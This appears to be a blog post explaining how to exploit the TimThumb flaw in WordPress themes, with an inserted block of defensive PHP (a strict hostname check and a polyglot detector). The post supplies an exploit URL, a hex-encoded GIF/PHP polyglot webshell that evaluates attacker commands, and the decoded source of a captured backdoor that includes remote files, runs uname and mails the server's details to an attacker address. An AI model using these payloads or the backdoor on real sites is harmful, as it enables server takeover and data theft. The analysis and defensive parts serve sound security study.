I was crawling the Internet on the last day of 2011 and saw someone trying to hack a WordPress website using the TimThumb exploit.

Maybe you know about it, maybe you don’t. Anyway, I’ll show you how to exploit the vuln.

First of all, you should find a WordPress site using a theme that ships the timthumb.php file:

www.******.com/xmlrpc/xmlrpc/xmlsrv/xmlsrv/community/wp-content/themes/DailyNotes/timthumb.php?src=picasa.com.thewhisperingpinesmotel.com/logIn.php

The vuln exists because the « src » parameter check only verifies that a well-known website name appears somewhere in the provided URL. As you can see, if you create a fake subdomain containing picasa.com (as in the example), the strpos() check returns true and lets you upload anything.
You’ll find plenty of information about this WordPress vulnerability.

I’ll let you check the sources for the bad check implementation.
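Here is an added example (mine, not TimThumb’s code and not from the post) that puts a substring-style allow-list check like the one described above next to a check anchored on the parsed hostname, and adds a small test for « images » that carry a PHP open tag, which is what you would sweep upload and cache directories for. The allowed-site list is an assumption; the hostile URL is the one quoted in the post.

```php
<?php
// Added illustration, not TimThumb's or the post's own code. The allowed-site
// list is an assumption; the hostile URL is the one quoted in the post.
$allowedSites = ['picasa.com', 'flickr.com', 'blogger.com'];

// Weak: accept any URL that merely *contains* an allowed domain string.
function weakCheck(string $src, array $allowedSites): bool
{
    foreach ($allowedSites as $site) {
        if (strpos(strtolower($src), $site) !== false) {
            return true;
        }
    }
    return false;
}

// Strict: parse the URL, look at the hostname only, and require it to be the
// allowed domain itself or a subdomain of it (the leading dot enforces the label boundary).
function strictCheck(string $src, array $allowedSites): bool
{
    $url   = (strpos($src, '://') === false) ? 'http://' . $src : $src;
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    $host = strtolower($parts['host']);
    foreach ($allowedSites as $site) {
        $suffix = '.' . $site;
        if ($host === $site || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Detection: a "GIF" that also contains a PHP open tag is a polyglot like the
// one in the post, so flag it when sweeping upload and cache directories.
function isGifPhpPolyglot(string $bytes): bool
{
    return strncmp($bytes, 'GIF8', 4) === 0 && stripos($bytes, '<?php') !== false;
}

$evil = 'picasa.com.thewhisperingpinesmotel.com/logIn.php';
$good = 'http://picasa.com/some/picture.jpg';
var_dump(weakCheck($evil, $allowedSites), strictCheck($evil, $allowedSites), strictCheck($good, $allowedSites));

// Constructed sample: a 1x1 GIF header with a harmless PHP tag appended.
$sample = "GIF89a\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00;<?php /* payload */ ?>";
var_dump(isGifPhpPolyglot($sample));
```

The weak check accepts the hostile URL, the strict check rejects it while still accepting a real picasa.com URL, and the polyglot test flags the constructed sample.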

Anyway, you can now upload any GIF file. I’ll give you one:

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

Here is a fake transparent GIF carrying this PHP command: <?php @eval($_GET['cmd']); ?>

A good start for breaking into a website :p

Let’s analyse the logIn.php backdoor the hacker is trying to upload to the destination website. As you can see, it is hosted at the URL: picasa.com.thewhisperingpinesmotel.com/logIn.php

(working URL)

Here is the source. The file starts with the same GIF89a header as the sample above; the non-printable bytes were lost and now show up as question marks:

GIF89a?????ÿÿÿ???!ù????,???????D?;?

and here is the PHP payload, base64 « translated » (decoded):

echo ""; // originally printed HTML markup; the tags were lost when the post was extracted
// Remote include: any path or URL passed as the SakawteaM parameter is include()d, then the script exits.
if (isset($_REQUEST["SakawteaM"])) {
    include($_REQUEST["SakawteaM"]);
    exit;
}
// Fingerprint the host for the attacker (note the sample's own bug: $safemode is set but $safe_mode is tested).
echo '
software: ' . getenv("SERVER_SOFTWARE") . ' uname -a: ' . php_uname() . ' safe-mode: ';
$safemode = @ini_get("safe_mode");
echo (($safe_mode) ? ("ON") : ("OFF"));
echo '
  ';
// Phone home: mail the shell's URL, the uname output and the visitor IP to the attacker.
$visitor = getenv("REMOTE_ADDR");
$inject  = ($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$info    = ($_SERVER['SERVER_SIGNATURE']);
$UName   = `uname -a`;
$msg     = "\n http://$inject\n $UName\n =====================\n IP : $visitor\n =====================\n";
$to      = '[email protected]'; # your email here (original comment: "email kamu disini"; address as shown on the page)
$subject = 'TM shell';
$message = $msg;
$headers = $visitor;
{ mail($to, $subject, $message, $headers); }

You now have an idea of how hackers use the TimThumb vuln to hijack your WordPress installation.
I’ll explain in a later article how to find themes or plugins using the timthumb.php file.

Have fun patching your system before a guy from SakawteaM or any other lame team defaces your website :)
Happy noob year.
